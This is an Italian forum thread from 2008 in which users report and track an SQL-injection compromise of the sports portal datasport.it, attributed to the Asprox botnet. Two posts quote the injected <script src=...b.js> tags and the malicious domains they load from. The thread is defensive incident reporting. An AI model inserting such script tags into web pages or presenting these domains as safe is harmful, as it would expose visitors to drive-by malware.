|
|
|
![]() |
|
Strumenti |
![]() |
#1 | |||
Bannato
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28894
|
[NEWS]Sito datasport.it ulteriormente compromesso
Giovedì 5 gugno 2008
Nel momento in cui scrivo il sito Datasport.it,sezione news calcio serie A, è stato ulteriormente violato: presenti redirect ai siti: Quote:
Ho già provveduto a segnalare la cosa a datasport.it(ore 10:05). Avira premium con webguard attivo non segnala nulla di anomalo riguardo lo script Consiglio a chi utilizza Internet Explorer e l'analisi completa del sistema,idem per chi utilizza Firefox SENZA l'estensione NoScript installata e attiva. Link all'analisi dello script su virustotal.com Contenuto dello script su datasport.it Quote:
Quote:
Seguiranno aggiornamenti Ultima modifica di juninho85 : 05-06-2008 alle 10:32. |
|||
![]() |
![]() |
![]() |
#2 | |||||||
Bannato
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28894
|
Questo il contenuto infetto della Homepage:
Quote:
Quote:
Quote:
Quote:
Quote:
Quote:
Quote:
sembrerebbe che i link scritti nel codice con sql injection cambi a seconda della sezione che si consulta Ultima modifica di juninho85 : 05-06-2008 alle 10:25. |
|||||||
![]() |
![]() |
![]() |
#3 | |
Bannato
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28894
|
dettagli:di tutti i siti in cui è stato fatto un defacement inserendo le scritte
Quote:
Questo mi fa supporre che datasport.it abbia subito due attacchi da diversi autori |
|
![]() |
![]() |
![]() |
#4 |
Senior Member
Iscritto dal: Sep 2007
Messaggi: 467
|
Datasport
Sito Datasport Ora sono script pericolosi
Juninho85 mi segnala che il portale italiano di sport Datasport presenta segni di un nuovo attacco di hacking ma questa volta di gran lunga piu' pericoloso dell'attacco di qualche giorno fa' In precedenza si era verificata la presenza di numerose pagine su dominio datasport.it che presentavano il messaggio “hacked by RedRolix .......” e concludendo il post scrivevo: “........... l'analisi de codice sorgente delle pagine colpite non rivela altri problemi a parte la scritta di hacking il che fa pensare che si tratti solo di una azione dimostrativa come avviane quotidianamente su parecchi siti anche .IT ..............Rimane comunque la gravita' del fatto in quanto dimostra una vulnerabilita' dei siti o dei server che li ospitano che potrebbe essere sfruttata per azioni ben piu' pericolose. (redirect a malware, pagine con exploit ecc...) .......” In effetti sta succedendo proprio questo e sia Datasport che altri domini sempre ad esso collega sul medesimo ip hostano adesso pericolosi scirpt che linkano a malware ma non solo Ecco un report eseguito con webscanner: dove si vede la grande quantita' di script presenti su varie url tutte collegate a datasport (questa volta nascosti nel codice e non visibili nel layout della pagina) e questo il sorgente di una pagina Per quanto si riferisce al codice dello script oltre al pericoloso link a pagina con explot abbiamo il link ad un sito antimalware fasullo che, ad aumentare il pericolo, se ce ne fosse bisogno, a differenza dei siti di rogue applications questa volta, anche lui, distribuisce malware e non semplice applicazione fasulla. Questo il report VT Quello che sorprende dell'attacco e' la grande quantita' di nomi diversi di pagine a cui puntano gli scripts e comunque e' quasi certo che datasport non sara' l'unico dominio attaccato ma sicuramente anche altri siti .IT subiranno medesima sorte. A mio avviso comunque non sono le stesse persone che hanno fatto l hacking precedente, come scrivo sul blog. A chi esegue questi attacchi non conviene farsi pubblicita' con proclami sulle pagine attaccate ma se mai agire ben nascosto ottenendo il massimo della distribuzione di malware. Il fatto delle scritte di hacking precedenti segnala comunque che erano tutti siti (o server) facilmente" bucabili" Edgar ![]() |
![]() |
![]() |
![]() |
#5 | |
Bannato
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28894
|
Quote:
![]() se ti possibile sarebbe molto utile raccogliere l'insieme dei domini presenti nelle varie sezioni del portale in modo da poterli inserire in blocklist ![]() |
|
![]() |
![]() |
![]() |
#6 |
Senior Member
Iscritto dal: Sep 2007
Messaggi: 467
|
Datasport
Sembra che ora Datasport sia offiline
Forse provvederanno a bonificare il sito. A me comunque risultavano questi script presenti sulle pagine Codice:
<script src=http://www.en-us18.com/b.js> <script src=http://www.libid53.com/b.js> <script src=http://www.rundll92.com/b.js> <script src=http://www.redir94.com/b.js> <script src=http://www.locale48.com/b.js> <script src=http://www.err68.com/b.js> <script src=http://www.sslput4.com/b.js> <script src=http://www.exe94.com/b.js> <script src=http://www.exec51.com/b.js> <script src=http://www.win496.com/b.js> <script src=http://www.sslnet72.com/b.js> (img sul blog) Edgar ![]() http://edetools.blogspot.com/ Ultima modifica di Edgar Bangkok : 05-06-2008 alle 11:34. |
![]() |
![]() |
![]() |
#7 |
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
A me risulta online, ma stanno pulendo a razzo
![]()
__________________
Try again and you will be luckier.
|
![]() |
![]() |
![]() |
#8 |
Bannato
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28894
|
la sezione news serie A calcio è stata ripulita,come anche la homepage(che poi son le 2 pagine da noi segnalate)...sul resto delle sezioni non è cambiato nulla PER ORA
|
![]() |
![]() |
![]() |
#9 |
Senior Member
Iscritto dal: Aug 2006
Città: Riviera del Brenta
Messaggi: 2047
|
E' l'asprox botnet e non il Sinowal (l' unica cosa in comune è che utilizzano lo stesso kit per exploit (Neosploit)).
|
![]() |
![]() |
![]() |
#10 |
Senior Member
Iscritto dal: Sep 2007
Messaggi: 467
|
datasport
Sono passate 2 ore, rifacendo una scansione di script ne trovo quasi piu' di prima
Siete sicuri che la home e' bonificata ??? Edgar ![]() |
![]() |
![]() |
![]() |
#11 |
Senior Member
Iscritto dal: Apr 2008
Messaggi: 1279
|
Quando si dice che c'è del marcio in Serie A
![]()
__________________
So di non sapere (cit.)... ![]() ![]() |
![]() |
![]() |
![]() |
#12 | |
Bannato
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28894
|
Quote:
la sezione basket/homepage(anch'essa infettata in mattinata)risulta non disponibile la sezione news calcio serie A è stata ripulita |
|
![]() |
![]() |
![]() |
#13 |
Senior Member
Iscritto dal: Sep 2007
Messaggi: 467
|
datasport
Al momento , 11.22 PM Thai (6.22 PM Ita) la home datasport e' tornata pulita ma una scansione rileva ancora almeno una trentina di scripts sparsi su 4 pagine (due pagine su sportmoviestv )
Edgar |
![]() |
![]() |
![]() |
#14 |
Senior Member
Iscritto dal: Aug 2006
Città: Riviera del Brenta
Messaggi: 2047
|
Nuovamente infetto
![]() ![]() |
![]() |
![]() |
![]() |
#15 |
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
__________________
Try again and you will be luckier.
|
![]() |
![]() |
![]() |
#16 |
Bannato
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28894
|
in quali pagine?io ora sto visualizzando le news calcio serie a e non vedo nulla...
la homepage del basket ormai non è più raggiungibili così come molte altre aree(chissà se per manutenzione o per altri motivi...) da diverse ore,mentre la home del portale risulta essere pulita intanto la segnalazione dello script malevolo ad avira non è andato a buon fine,per loro è tutto ok! ![]() |
![]() |
![]() |
![]() |
#17 |
Senior Member
Iscritto dal: Aug 2006
Città: Riviera del Brenta
Messaggi: 2047
|
Nell' HomePage del sito ci sono
Codice:
http://www.sslnet72.com/b.js http://www.view89.com/b.js |
![]() |
![]() |
![]() |
#18 |
Bannato
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28894
|
confermo
intanto su 213.156.44.204,IP in cui oltre a datasport.it si trovano altri 7 domini,risultano nella medesima situazione www.STEFANOLAVORI.COM e www.DATABASKET.NET(facente parte sempre di datasport) |
![]() |
![]() |
![]() |
#19 |
Senior Member
Iscritto dal: Sep 2007
Messaggi: 467
|
datasport
Questa mattina , ora thai, (le 3 AM del 6 giugno in Italia) ho riverificato il sito dtasport
Ci sono ancora alcune pagine con scripts per un totale di 176 presenze del codice Ho messo un aggiornamento del report su blog http://edetools.blogspot.com/ Per il fatto che dopo che era bonificato veniva di nuovo colpito penso che 'curassero' i sintomi dell'attacco (ripristinando qualche backup) ma non le cause... e quindi tutto ritornasse come prima. Edgar ![]() |
![]() |
![]() |
![]() |
#20 |
Senior Member
Iscritto dal: Sep 2007
Messaggi: 467
|
scripts
Ad una verifica eseguita nuovamnete dopo qualche ora (10.30 am in italia) s sembra che il numero di scripts presenti sia ancora abbastanza elevato.
Ci sono in totale , nelle pagine controllate, 267 scripts. (report aggiornato sul blog) Edgar http://edetools.blogspot.com/ |
![]() |
![]() |
![]() |
Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 11:54.